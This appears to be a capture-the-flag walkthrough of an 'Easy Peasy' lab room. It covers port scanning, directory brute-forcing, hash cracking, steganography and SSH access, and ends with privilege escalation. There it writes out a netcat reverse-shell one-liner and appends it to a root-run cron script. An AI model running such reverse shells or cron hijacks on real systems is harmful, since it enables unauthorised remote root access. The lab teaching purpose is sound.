Easy Peasy

Reconnaissance

Initial nmap scan to find all open ports

nmap -p- -T5 10.10.53.168

There are three ports open

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 80,6498,65524

  • (-oN nmap): Saving it into a file called nmap

nmap -sV -sC -p 80,6498,65524 -oN nmap 10.10.53.168

The version of nginx is 1.16.1

Apache is running on the highest port

Enumeration

Port 80: HTTP

Lets visit the site.

There is nothing interesting in the links provided and in the source code, lets run gobuster to find hidden files and directories.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.53.168/

Looks like we found a directory, lets run another gobuster scan on this directory while we explore this one.

We found another directory, lets visit both these pages.

There seems to be nothing, lets go to the whatever directory

There is nothing on the page, lets look at the source code

We have a hash, lets decrypt it.

We have the first flag

Port 65524: HTTP

Lets visit the site

Its a Apache 2 default page, scrolling down a bit, we find flag 3.

Lets run gobuster to find hidden directories and files.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.53.168:65524/

While gobuster is running lets check the robots.txt page, we find some interesting information there.

This looks like a hash, lets try to crack it. Lets first try to identify what type of hash it is

Its a MD5 hash, now lets crack it.

And we have the second flag.

Looking back at the default page, we have something else in the source code

Another hash. Lets crack it

Its another directory, lets visit it.

Its a page with binary code image, lets look at the source code.

We have a string, lets try to identify the hash.

Lets crack it.

Looks like it is a password

Now lets download the binary picture and see if there is anything hidden in it using steghide.

steghide --extract -sf binarycodepixabay.jpg

It is asking for a password, so I used the one we just found.

We found a text file, lets read it.

We have a username and a password in binary, lets decode it.

We found the password, lets login through ssh. The ssh server is running on port 6498 based on our nmap scan.

ssh -p 6498 boring@10.10.53.168

We are logged in.

We can read the user.txt file, but it seems to be encrypted, so I will leave cracking it to you. (Hint: CyberChef and ROT 13)

We can also answer all the other questions

Privilege Escalation

As the room had cronjob as one of its tags, I looked for .sh file in the system that belonged to the user boring.

find / -type f -user boring -name *.sh 2>/dev/null

Looks like we have a file, lets look at it.

It says it will run as root, so why don't we echo a reverse shell into the file to get a shell as root.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f" >> .mysecretcronjob.sh

Make sure to change the IP in the command and start a netcat listener

Once you echo the command into the file, the contents of the file should look like this.

After a while you should get a shell as root

Last updated